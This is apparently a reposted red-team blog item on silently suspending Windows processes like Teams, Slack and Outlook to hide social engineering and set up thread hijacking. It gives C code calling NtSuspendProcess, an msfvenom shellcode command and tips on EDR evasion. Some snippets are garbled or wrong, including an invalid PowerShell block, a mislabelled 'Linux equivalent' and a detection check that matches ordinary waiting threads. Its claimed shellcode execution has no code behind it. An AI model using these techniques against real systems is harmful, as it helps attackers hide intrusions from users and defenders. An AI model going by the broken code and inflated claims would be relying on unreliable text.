Listen to this Post
Lately, I’ve been exploring ways to silently freeze Windows processes—specifically to enable process hijacking during covert red team operations. The idea came from a previous engagement where direct access to high-value targets was achieved through Microsoft Teams. The challenge? The compromised user had Teams running continuously, making internal social engineering risky due to real-time visibility.
This led to researching methods to discreetly pause processes, making them appear functional while rendering them inert. The solution involves manipulating process thread properties, and the technique has proven effective against applications like Teams, Slack, and Outlook.
Blog Post: https://lnkd.in/gQtUuNeU
GitHub: https://lnkd.in/gTww9zWH
You Should Know:
1. Suspending a Process via Command Line
Use PowerShell or `NtSuspendProcess` (via NtDll) to freeze a process silently:
PowerShell: Suspend a process by PID
$process = Get-Process -Name "Teams"
$process.Threads | ForEach-Object {
(Get-ProcAddress kernel32.dll SuspendThread),
(delegate int SuspendThread(IntPtr hThread))
).Invoke($_.Id)
}
2. Using NtSuspendProcess in C (BOF-Friendly)
For Beacon Object Files (BOF), leverage direct syscalls:
include <windows.h>
include <stdio.h>
typedef NTSTATUS (NTAPI PNtSuspendProcess)(HANDLE hProcess);
void SuspendProcess(DWORD pid) {
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
PNtSuspendProcess NtSuspendProcess = (PNtSuspendProcess)GetProcAddress(
GetModuleHandle("ntdll"), "NtSuspendProcess");
NtSuspendProcess(hProcess);
CloseHandle(hProcess);
}
3. Resuming a Frozen Process
Reverse the action using `NtResumeProcess`:
PNtResumeProcess NtResumeProcess = (PNtResumeProcess)GetProcAddress(
GetModuleHandle("ntdll"), "NtResumeProcess");
NtResumeProcess(hProcess);
4. Process Injection via Thread Hijacking
After freezing, inject shellcode into the process:
Linux equivalent (for cross-platform ops) msfvenom -p windows/x64/exec CMD="calc.exe" -f raw > shellcode.bin
5. Detecting Suspended Processes
Check for suspended threads via Task Manager (Details tab) or PowerShell:
Get-Process | Where-Object { $_.Threads.ThreadState -eq "Wait" }
What Undercode Say:
Silently freezing processes is a powerful technique for red teams, enabling stealthy persistence and social engineering bypasses. However, defenders can detect anomalies via thread state monitoring or EDR solutions inspecting `NtSuspendProcess` calls. Always test in controlled environments and combine with other evasion tactics like process hollowing or direct syscalls.
Expected Output:
- Suspended target process (e.g., Teams) with no visible disruption.
- Successful shellcode execution in the frozen process space.
- Defensive evasion via indirect syscalls and minimal API tracing.
References:
Reported By: Ibai Castells – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
